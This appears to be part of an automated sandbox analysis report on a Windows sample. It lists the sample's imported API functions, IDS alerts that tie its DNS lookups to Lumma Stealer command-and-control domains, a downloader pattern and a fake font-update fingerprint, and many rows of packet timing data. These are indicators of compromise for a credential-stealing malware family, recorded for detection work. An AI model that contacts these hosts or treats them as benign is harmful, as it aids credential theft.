                                                                                                                                                                                                                                                KERNEL32.dllSearchPathW, SetThreadContext, DeleteTimerQueueEx, DebugActiveProcessStop, CreateProcessW, SetWaitableTimer, GetConsoleAliasA, InterlockedDecrement, SetDefaultCommConfigW, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetCurrentThread, GetEnvironmentStrings, GlobalAlloc, LoadLibraryW, GetSystemTimeAdjustment, GetVersionExW, GetTimeFormatW, GetAtomNameW, GetVolumePathNameA, GetStartupInfoW, RaiseException, Module32First, SetLastError, GetProcAddress, GetLongPathNameA, SetFileAttributesA, LoadLibraryA, InterlockedExchangeAdd, MoveFileA, AddAtomA, FoldStringA, SetLocaleInfoW, OpenFileMappingW, GetFileTime, FindFirstVolumeA, FindAtomW, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, WriteFile, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, VirtualAlloc, HeapReAlloc, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, SetStdHandle, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, CreateFileA, CloseHandle, HeapSize, GetModuleHandleA
                                                                                                                                                                                                                                                USER32.dllGetProcessDefaultLayout
                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                2025-01-12T17:52:01.923189+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704172.67.179.207443TCP
                                                                                                                                                                                                                                                2025-01-12T17:52:02.739573+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705176.113.115.1980TCP
                                                                                                                                                                                                                                                2025-01-12T17:52:05.685065+01002059088ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click)1192.168.2.5631651.1.1.153UDP
                                                                                                                                                                                                                                                2025-01-12T17:52:05.700683+01002059051ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)1192.168.2.5650281.1.1.153UDP
                                                                                                                                                                                                                                                2025-01-12T17:52:05.714240+01002059041ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop)1192.168.2.5612071.1.1.153UDP
                                                                                                                                                                                                                                                2025-01-12T17:52:05.725642+01002059035ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop)1192.168.2.5654371.1.1.153UDP
                                                                                                                                                                                                                                                2025-01-12T17:52:05.736408+01002059039ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop)1192.168.2.5551441.1.1.153UDP
                                                                                                                                                                                                                                                2025-01-12T17:52:05.746939+01002059057ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop)1192.168.2.5599721.1.1.153UDP
                                                                                                                                                                                                                                                2025-01-12T17:52:05.755307+01002059037ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop)1192.168.2.5520661.1.1.153UDP
                                                                                                                                                                                                                                                2025-01-12T17:52:05.766501+01002059043ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop)1192.168.2.5579541.1.1.153UDP
                                                                                                                                                                                                                                                2025-01-12T17:52:05.777221+01002059049ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop)1192.168.2.5557631.1.1.153UDP
                                                                                                                                                                                                                                                2025-01-12T17:52:06.451964+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.102.49.254443TCP
                                                                                                                                                                                                                                                2025-01-12T17:52:06.933921+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.549706104.102.49.254443TCP
                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.024930000 CET49704443192.168.2.5172.67.179.207
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.024981022 CET44349704172.67.179.207192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.025288105 CET49704443192.168.2.5172.67.179.207
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.034555912 CET49704443192.168.2.5172.67.179.207
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.034580946 CET44349704172.67.179.207192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.537940979 CET44349704172.67.179.207192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.538022041 CET49704443192.168.2.5172.67.179.207
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.596087933 CET49704443192.168.2.5172.67.179.207
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.596117020 CET44349704172.67.179.207192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.596602917 CET44349704172.67.179.207192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.596667051 CET49704443192.168.2.5172.67.179.207
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.623729944 CET49704443192.168.2.5172.67.179.207
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.667330980 CET44349704172.67.179.207192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.923223972 CET44349704172.67.179.207192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.923377037 CET49704443192.168.2.5172.67.179.207
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.923405886 CET44349704172.67.179.207192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.923460007 CET49704443192.168.2.5172.67.179.207
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.923584938 CET44349704172.67.179.207192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.923624992 CET49704443192.168.2.5172.67.179.207
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.925673962 CET49704443192.168.2.5172.67.179.207
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.925700903 CET44349704172.67.179.207192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.925714970 CET49704443192.168.2.5172.67.179.207
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.925749063 CET49704443192.168.2.5172.67.179.207
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.054490089 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.059650898 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.059742928 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.059999943 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.065054893 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739356995 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739381075 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739406109 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739418030 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739428997 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739440918 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739453077 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739463091 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739474058 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739485979 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739573002 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739573002 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.744415998 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.744457960 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.744471073 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.744482040 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.744493008 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.744586945 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.744586945 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.859738111 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.859754086 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.859765053 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.859858990 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.859862089 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.859862089 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.859869957 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.860071898 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.860085964 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.860097885 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.860109091 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.860117912 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.860117912 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.860610008 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.860622883 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.860635042 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.860647917 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.860658884 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.860660076 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.860660076 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.860711098 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.860711098 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.861255884 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.861267090 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.861279011 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.861291885 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.861304045 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.861304045 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.861335993 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.861366034 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.861366034 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.861459017 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.862103939 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.862116098 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.862131119 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.862149000 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.862159967 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.862159967 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.862329960 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.864613056 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.864665031 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.864681959 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.866265059 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980242014 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980269909 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980283022 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980305910 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980317116 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980348110 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980350018 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980360985 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980377913 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980438948 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980438948 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980458975 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980479002 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980492115 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980529070 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980531931 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980531931 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980540991 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980671883 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980832100 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980844975 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980858088 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980870008 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980880022 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980881929 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980895042 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980923891 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980923891 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981257915 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981271029 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981285095 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981296062 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981301069 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981301069 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981308937 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981323004 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981324911 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981336117 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981515884 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981612921 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981653929 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981664896 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981674910 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981710911 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981710911 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981729031 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981740952 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981754065 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981766939 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981787920 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981787920 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981790066 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981801987 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981815100 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981827974 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981833935 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981833935 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981842995 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981853008 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981887102 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981887102 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982598066 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982620001 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982631922 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982644081 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982652903 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982656956 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982669115 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982712030 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982734919 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982742071 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982753992 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982758045 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982758999 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982768059 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982780933 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982793093 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982798100 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982798100 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982805967 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982860088 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982860088 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.986435890 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.989270926 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100739956 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100786924 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100822926 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100835085 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100835085 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100858927 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100867033 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100924969 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100933075 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100965977 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101002932 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101005077 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101005077 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101036072 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101064920 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101072073 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101108074 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101119041 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101119041 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101244926 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101246119 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101280928 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101315022 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101320028 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101320028 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101353884 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101392031 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101392031 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101495028 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101530075 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101540089 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101564884 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101571083 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101613998 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101634026 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101650000 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101686001 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101686001 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101716042 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101753950 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101779938 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101823092 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.101982117 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.102015972 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.102026939 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.102067947 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.102109909 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.102109909 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.102112055 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.102125883 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.102138042 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.102164030 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.102164030 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.102173090 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.102190971 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.102207899 CET8049705176.113.115.19192.168.2.5
